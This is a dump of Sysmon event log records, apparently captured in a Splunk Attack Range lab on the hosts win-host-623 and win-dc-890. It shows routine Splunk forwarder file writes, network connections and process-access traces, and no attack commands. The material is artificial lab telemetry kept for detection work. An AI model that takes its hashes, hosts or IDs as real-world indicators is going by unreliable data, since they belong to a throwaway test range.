Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E3A21C7336D2B9D952F4D8AB5F4CF5C,SHA256=ECD733E3B773F7FE690D7AA81800A93A82DD5AB11A25AF87DAB733959E9D0E04,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807158Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:17.224{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57238-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807160Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:19.497{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A84D6E31F225F731664A08A7EAF54F30,SHA256=B885E1301871843D2D18F749B8019747000F2DD17244A3FE78282B4BB5FD78E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:10.656{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50998-false10.0.1.12-8000- 23542300x80000000000000001047994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:19.025{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C45F2923B5DCCC747930EA0A7A904BDD,SHA256=4B2F89959AADF550A085E3253E98B85D83607831EA73BD4286404226F361FF8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807162Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:20.497{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C15EB58AE9490B0079A2078A89B66C7E,SHA256=BA8A8BD379292A0A10CFE7B320D92022CE31764241B45D5B956B668F2BAFDC92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:20.041{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0ED5D159F56BA070D6E146F00F902B2,SHA256=E0165C460600A6FF715335817447A05E64CAE512FF1EED0467A7B0E417AAE4B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807161Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:20.435{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807163Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:21.513{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47AB0CAD6BA93705B36F6B09AEF1DFB7,SHA256=881E6322C3E08815F6BB78581F6FD9DCD40912090F4EE276349FB8FAB5D1FB76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:21.055{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C0CBF1DA2B2F02FC453E7B3DE7BFF9B,SHA256=0FEBDC7225DEF0940EBCCBD8C46EC2CB55D450305C85626D6E4E7706A39E21EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807165Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:20.567{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57239-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000807164Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:22.513{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8A8C0E75893D051B55758B760291492,SHA256=FC03690665E1628AC1F6C8E780C405536848F899B6E90FDB58095E733FDEAEB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:22.071{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65F2A390949DA4E3B7F6D21F3AB3BF12,SHA256=77CF9E55E00E052314556BF13CF5E33A5CEC1CC85FA108B16B42FC4A8AFFF51E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807166Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:23.529{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9BF3423EA009705424CFA175A557BEF,SHA256=B728B1C77C7EF4F9514E415AC4001D063E823CE695D1D38C819EA19AF4EB98FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:23.088{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2EF02C96E9CC0E004AC2840BF22B4AB,SHA256=519A15BF69DD4EA6A198B0AAE54EC945AAF4FF2D8FAF7E5F73D3C2B20EC15577,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807195Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F440-60EB-6679-00000000D001}3820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807194Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807193Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807192Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807191Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807190Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807189Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807188Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807187Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807186Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F440-60EB-6679-00000000D001}3820C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807185Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807184Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F440-60EB-6679-00000000D001}3820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807183Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.765{0C1E0330-F440-60EB-6679-00000000D001}3820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807182Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.544{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0AB5FC9820CCB83A7E9D81A2D0C1E1D,SHA256=9E9A3DF50CC2313EF3227F0B4AA5F01B13DD81F14DEDAE411E3237E4C405DC67,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:15.769{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50999-false10.0.1.12-8000- 23542300x80000000000000001048000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:24.106{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72A30631206CE8CC7BDDD8A236DF96AB,SHA256=824041F313B39CCF77EA17F4C83996E99956132E3B4C4DC09C64CFCFBB8BFB65,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807181Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.482{0C1E0330-F440-60EB-6579-00000000D001}1252828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000807180Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:23.192{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57240-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 
10341000x8000000000000000807179Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F440-60EB-6579-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807178Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807177Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807176Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 